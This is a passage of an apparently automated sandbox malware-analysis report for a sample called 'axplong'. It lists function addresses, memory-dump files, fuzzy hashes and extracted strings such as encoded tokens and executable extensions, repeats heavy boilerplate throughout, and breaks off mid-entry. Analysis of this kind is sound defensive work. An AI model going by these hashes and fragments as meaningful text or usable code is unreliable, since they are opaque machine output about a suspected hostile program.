                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: 19a17a3a9160326ade8cb602582e20f869d763b0eca62ed52d5ece7600c4f83c
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: D351467020C64896DB3C8A3888DABBE679A9F513CCF180959DC43D7682DB1F9D8DC352
                    Function 00734CF0 Relevance: .7, Instructions: 701COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f0fc92efffa3b9696a93c623d32dacd184f57112ed9544b16727a8d0f198837e
                    • Instruction ID: 72ac8bda2c0c9951f7ad5bd6d0e54bbd7daca1de749cabb472c172d7e9dce897
                    • Opcode Fuzzy Hash: f0fc92efffa3b9696a93c623d32dacd184f57112ed9544b16727a8d0f198837e
                    • Instruction Fuzzy Hash: CC2250B3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                    Function 00776F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 422f75966a542c23c3a9601e64454b16d3a5190dc110eea02118c6f525420ff7
                    • Instruction ID: 65f2dc3d8038b9923dd97b32ea4571edb06c572198f66a21a278cc916e19e330
                    • Opcode Fuzzy Hash: 422f75966a542c23c3a9601e64454b16d3a5190dc110eea02118c6f525420ff7
                    • Instruction Fuzzy Hash: 80B14B31214609DFDB19CF28C486B657BA0FF453A4F69C658E89DCF2A1C739E992CB40
                    Function 00734AF0 Relevance: .2, Instructions: 158COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ee79290acdcc07def22c631f4171e0b93e977a145c7c6f375487a2622764d98
                    • Instruction ID: 7142dcd081835c95b9ed0cb7a12be262c110b12634f907cc0d9a6519ee34cd2f
                    • Opcode Fuzzy Hash: 2ee79290acdcc07def22c631f4171e0b93e977a145c7c6f375487a2622764d98
                    • Instruction Fuzzy Hash: 8551D47160C3918FD329CF2C811563AFFE1AF85200F084A9EE0D687292D738DA44CBA2
                    Function 0077777B Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ac88e4d854f1e1049c3f4bfd1526469aba53505310f75e620b20a0ee98c53d9
                    • Instruction ID: b296bebcc215be54c4760f2d58c0a4d614b19de5b548c0ade1729dc995fa3afb
                    • Opcode Fuzzy Hash: 2ac88e4d854f1e1049c3f4bfd1526469aba53505310f75e620b20a0ee98c53d9
                    • Instruction Fuzzy Hash: A421B673F204394B7B0CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                    Function 0077765B Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc15c47706f33a0ba429c53f2f3d82a2c6615a8ca4f3e7aba18d5def44229feb
                    • Instruction ID: 987ec778a1859dcbf423a697429a84b66fc992dbf53d0af6eefec0167b131c6c
                    • Opcode Fuzzy Hash: cc15c47706f33a0ba429c53f2f3d82a2c6615a8ca4f3e7aba18d5def44229feb
                    • Instruction Fuzzy Hash: A4117723F30C255A675C816D8C1727AA5D2DBD825071F933AD826E7284E994DE23D290
                    Function 00778720 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: d3084f7ff709a45d2003f3e0bd90a915fba0749d581570a060bab27222b32b42
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 38113B772C014143DE8C86ADC8FC5B6A795EBD53A173CC375C04B4B758D92A9944D582
                    Function 05160BA6 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88eafd3b0938db72e3bcdc954b72eef72cfccaa84d53b5525971d234960bee1a
                    • Instruction ID: 1a1330c828b9701e564b161c0729822c045748653f5fce8d2963e4afcb932acd
                    • Opcode Fuzzy Hash: 88eafd3b0938db72e3bcdc954b72eef72cfccaa84d53b5525971d234960bee1a
                    • Instruction Fuzzy Hash: AAF02DEB18C110BE60599242576C9FA7E6FF0CB3713338866F00B81902E3950E595532
                    Function 0076645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5138e552f66906c2273a38c3c40d75469677b302a9e24522611a531d9b9f178d
                    • Instruction ID: 8fbd327b64a15356a50c72de24f78ce9fa09ce91e360370db9a71f3fc29cbf2c
                    • Opcode Fuzzy Hash: 5138e552f66906c2273a38c3c40d75469677b302a9e24522611a531d9b9f178d
                    • Instruction Fuzzy Hash: 41E04630240688ABCA357B18C84CD483B6AEF92750F404818FC0686622CB29EEC1CA90
                    Function 0076A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: 5e06f4e0f01ff9ac68bbac1804f62b9149e23dc21f6815d1faaf64e383075de4
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: E5E0B672A15228FBCB19DB98894898AF2BCFB4AB50F554496B902E3251C274DF40CBD1
                    Function 00742E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                    • API String ID: 0-2390467879
                    • Opcode ID: dc18a6381d8d71762b688cdd653415797e099acee561196ddcf9195f4a295273
                    • Instruction ID: 19943748f8cbcbabb8039b3a79d941fa83cd998fe94799429cf8421e7e539272
                    • Opcode Fuzzy Hash: dc18a6381d8d71762b688cdd653415797e099acee561196ddcf9195f4a295273
                    • Instruction Fuzzy Hash: 2802B271A00248EFEF14EFA8C849BDEBBB5EF05304F504559E805A7282D7799A85CBA1
                    Function 00747870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0074795C
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00747968
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00747971
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                    • String ID: 'ktd+y$@yt$d+y
                    • API String ID: 4078500453-2595975181
                    • Opcode ID: 9fc825874fe5ae41b863ea57054de57bba78dd2086b779376678532b4d35fed9
                    • Instruction ID: 9a2fd30511a5d095308893157e6ef3552b787bf2fdfddd3820495471e2aaea97
                    • Opcode Fuzzy Hash: 9fc825874fe5ae41b863ea57054de57bba78dd2086b779376678532b4d35fed9
                    • Instruction Fuzzy Hash: 3F31E3B2904304DBD724DF68D849A6AB7E8EF15310F100A3EE946C7242E779FA54C7E1
                    Function 007670C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 9e18ae43efa262ab899841182ff182a4f34fe7d77519326da56073f2e0017db8
                    • Instruction ID: 7f544fd024ab1fa71a9b843776344d7c18ad0a0feb89aba394441fe9a3c31b8f
